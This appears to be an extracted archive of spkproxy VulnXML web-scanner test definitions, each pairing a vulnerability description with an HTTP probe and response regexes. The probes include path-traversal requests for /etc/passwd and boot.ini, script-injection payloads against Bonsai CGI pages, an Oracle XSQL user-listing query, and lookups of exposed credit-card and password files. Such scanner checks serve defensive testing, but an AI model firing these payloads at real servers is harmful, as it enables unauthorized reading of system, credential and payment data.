See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webcart/config/clients.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-781.xml0100664000076500007650000000716307566204543017573 0ustar davedave (orders/) "This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webcart/orders/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-782.xml0100664000076500007650000000721007566204543017565 0ustar davedave (orders/import.txt) "This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webcart/orders/import.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-783.xml0100664000076500007650000000747407566204543017602 0ustar davedave (MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif) "Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-784.xml0100664000076500007650000000750207566204543017573 0ustar davedave (MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif) "Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-785.xml0100664000076500007650000000704707566204543017600 0ustar davedave (cc.txt) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /WebShop/logs/cc.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-786.xml0100664000076500007650000000705407566204543017577 0ustar davedave (cc.txt) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /WebShop/templates/cc.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-787.xml0100664000076500007650000000752507566204543017603 0ustar davedave (ccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webtools/bonsai/ccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-788.xml0100664000076500007650000000745107566204543017602 0ustar davedave (cvsblame.cgi?file=<script>alert('Vulnerable')</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-789.xml0100664000076500007650000000751507566204543017604 0ustar davedave (cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-78.xml0100664000076500007650000000706607566204543017514 0ustar davedave (/) "Directory indexing enabled 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /examples/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Directory Listing 200 Directory Listing 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-790.xml0100664000076500007650000000744507566204543017576 0ustar davedave (cvslog.cgi?file=<script>alert('Vulnerable')</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-791.xml0100664000076500007650000001004107566204543017561 0ustar davedave (cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-792.xml0100664000076500007650000001006707566204543017572 0ustar davedave (cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-793.xml0100664000076500007650000000757707566204543017607 0ustar davedave (cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-794.xml0100664000076500007650000000746507566204543017604 0ustar davedave (showcheckins.cgi?person=<script>alert('Vulnerable')</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-795.xml0100664000076500007650000000736207566204543017601 0ustar davedave (web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html) "eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-796.xml0100664000076500007650000000722607566204543017601 0ustar davedave (conflict.php) "Some versions of this script allow external source to be included/run by appending ?TemplateDir=http://my.host/ to requests." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wikihome/action/conflict.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-797.xml0100664000076500007650000000714207566204543017577 0ustar davedave (passwd.txt) "The wwwboard password file is browsable. Change wwwboard to store this file elsewhere 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wwwboard/passwd.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-798.xml0100664000076500007650000000705707566204543017605 0ustar davedave (wwwboard.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wwwboard/wwwboard.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-799.xml0100664000076500007650000000705507566204543017604 0ustar davedave (wwwboard.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wwwboard/wwwboard.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-79.xml0100664000076500007650000000712107566204543017505 0ustar davedave (index.html) "Apache Tomcat default JSP pages present." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /examples/jsp/index.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ JSP Samples 200 JSP Samples 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-800.xml0100664000076500007650000000705307566204543017561 0ustar davedave (3tvars.pm) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wwwthreads/3tvars.pm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-801.xml0100664000076500007650000000705507566204543017564 0ustar davedave (w3tvars.pm) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wwwthreads/w3tvars.pm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-802.xml0100664000076500007650000000710607566204543017562 0ustar davedave (/) "Default Oracle documentation found." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /xdk/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Oracle XML Development 200 Oracle XML Development 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-803.xml0100664000076500007650000000733607566204543017570 0ustar davedave (query.xsql?sql=select%20username%20from%20ALL_USERS) "This allows attackers to perform queries to the Oracle database. This sample app should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ USERNAME 200 USERNAME 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-804.xml0100664000076500007650000000726107566204543017566 0ustar davedave (airport.xsql?xml-stylesheet=none) "This is a sample file which should be removed. Oracle XSQL allows arbitrary code to be execute." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /xsql/demo/airport/airport.xsql?xml-stylesheet=none HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ cvsroot 200 cvsroot 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-805.xml0100664000076500007650000000744107566204543017567 0ustar davedave (<script>alert('Vulnerable')</script>.asp) "Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). CA-2000-02" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /~/<script>alert('Vulnerable')</script>.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-806.xml0100664000076500007650000000744407566204543017573 0ustar davedave (<script>alert('Vulnerable')</script>.aspx) "Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /~/<script>alert('Vulnerable')</script>.aspx HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-807.xml0100664000076500007650000000751207566204543017570 0ustar davedave (<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null) "Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-80.xml0100664000076500007650000000727007566204543017502 0ustar davedave (source.jsp??) "Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /examples/jsp/source.jsp?? HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Directory Listing 200 Directory Listing 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-81.xml0100664000076500007650000000714307566204543017502 0ustar davedave (snoop.jsp) "Displays information about page retrievals 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /examples/jsp/snp/snoop.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Request Information 200 Request Information 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-82.xml0100664000076500007650000000725107566204543017503 0ustar davedave (TroubleShooter) "Tomcat default jsp page reveals system information and may be vulnerable to XSS." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /examples/servlet/TroubleShooter HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ TroubleShooter Servlet Output 200 TroubleShooter Servlet Output 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-83.xml0100664000076500007650000000714007566204543017501 0ustar davedave (index.html) "Apache Tomcat default JSP pages present." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /examples/servlets/index.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Servlet Examples 200 Servlet Examples 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 